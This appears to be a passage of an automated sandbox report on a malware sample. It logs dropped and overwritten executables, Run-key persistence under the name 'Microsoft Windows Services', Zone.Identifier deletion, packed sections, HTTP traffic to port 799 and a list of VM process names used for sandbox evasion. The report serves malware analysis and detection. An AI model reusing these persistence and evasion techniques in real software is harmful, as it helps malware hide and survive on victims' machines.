        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msimg32.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: secur32.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: sspicli.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msasn1.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: uxtheme.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: windows.storage.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wldp.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wininet.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: urlmon.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: iertutil.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: srvcli.dll
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Binary string: C:\Us .pdb source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeUnpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeUnpacked PE file: 1.2.XBVdJN.exe.610000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 9.2.winsvcs.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeUnpacked PE file: 10.2.XBVdJN.exe.6e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 14.2.winsvcs.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeUnpacked PE file: 15.2.XBVdJN.exe.180000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeUnpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 9.2.winsvcs.exe.400000.0.unpack
        Source: C:\Windows\94000696690303050\winsvcs.exeUnpacked PE file: 14.2.winsvcs.exe.400000.0.unpack
        Source: initial sampleStatic PE information: section where entry point is pointing to: 1uD
        Source: LisectAVT_2403002B_290.exeStatic PE information: section name: .text1
        Source: LisectAVT_2403002B_290.exeStatic PE information: section name: .data1
        Source: LisectAVT_2403002B_290.exeStatic PE information: section name: .trace
        Source: LisectAVT_2403002B_290.exeStatic PE information: section name: 1uD
        Source: winsvcs.exe.0.drStatic PE information: section name: .text1
        Source: winsvcs.exe.0.drStatic PE information: section name: .data1
        Source: winsvcs.exe.0.drStatic PE information: section name: .trace
        Source: winsvcs.exe.0.drStatic PE information: section name: 1uD
        Source: XBVdJN.exe.0.drStatic PE information: section name: .aspack
        Source: XBVdJN.exe.0.drStatic PE information: section name: .adata
        Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
        Source: MyProg.exe.1.drStatic PE information: section name: PELIB
        Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
        Source: SciTE.exe.1.drStatic PE information: section name: u
        Source: Windows Archive Manager.exe.6.drStatic PE information: section name: .text1
        Source: Windows Archive Manager.exe.6.drStatic PE information: section name: .data1
        Source: Windows Archive Manager.exe.6.drStatic PE information: section name: .trace
        Source: Windows Archive Manager.exe.6.drStatic PE information: section name: 1uD
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004047C0 push eax; ret 0_2_004047EE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00426F13 push ecx; ret 0_2_00426F26
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00426FF1 push ecx; ret 0_2_00427004
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_00611638 push dword ptr [00613084h]; ret 1_2_0061170E
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_0061600A push ebp; ret 1_2_0061600D
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_00616014 push 006114E1h; ret 1_2_00616425
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_00612D9B push ecx; ret 1_2_00612DAB
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_004047C0 push eax; ret 6_2_004047EE
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00426F13 push ecx; ret 6_2_00426F26
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00426FF1 push ecx; ret 6_2_00427004
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00426F13 push ecx; ret 9_2_00426F26
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00426FF1 push ecx; ret 9_2_00427004
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E1638 push dword ptr [006E3084h]; ret 10_2_006E170E
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E600A push ebp; ret 10_2_006E600D
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E2D9B push ecx; ret 10_2_006E2DAB
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E6014 push 006E14E1h; ret 10_2_006E6425
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00426F13 push ecx; ret 14_2_00426F26
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00426FF1 push ecx; ret 14_2_00427004
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_00181638 push dword ptr [00183084h]; ret 15_2_0018170E
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_00182D9B push ecx; ret 15_2_00182DAB
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_00186014 push 001814E1h; ret 15_2_00186425
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_0018600A push ebp; ret 15_2_0018600D
        Source: LisectAVT_2403002B_290.exeStatic PE information: section name: 1uD entropy: 6.934614473647855
        Source: winsvcs.exe.0.drStatic PE information: section name: 1uD entropy: 6.934614473647855
        Source: XBVdJN.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
        Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934551397583471
        Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.9345101913280525
        Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934760602123565
        Source: Windows Archive Manager.exe.6.drStatic PE information: section name: 1uD entropy: 6.934614473647855

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeExecutable created and started: C:\Windows\94000696690303050\winsvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Windows\94000696690303050\winsvcs.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Windows\94000696690303050\winsvcs.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Users\user\AppData\Local\Temp\XBVdJN.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Windows\94000696690303050\winsvcs.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows ServicesJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft Windows ServicesJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft Windows ServicesJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows ServicesJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows ServicesJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile opened: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeFile opened: C:\Windows\94000696690303050\winsvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 799
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe vboxcontrol.exe vmwareservice.exe vmwaretray.exe vmtoolsd.exe vmwareuser.exe 0_2_0040317D
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe vboxcontrol.exe vmwareservice.exe vmwaretray.exe vmtoolsd.exe vmwareuser.exe 6_2_0040317D
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-13088
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-13088
        Source: C:\Windows\94000696690303050\winsvcs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-13088
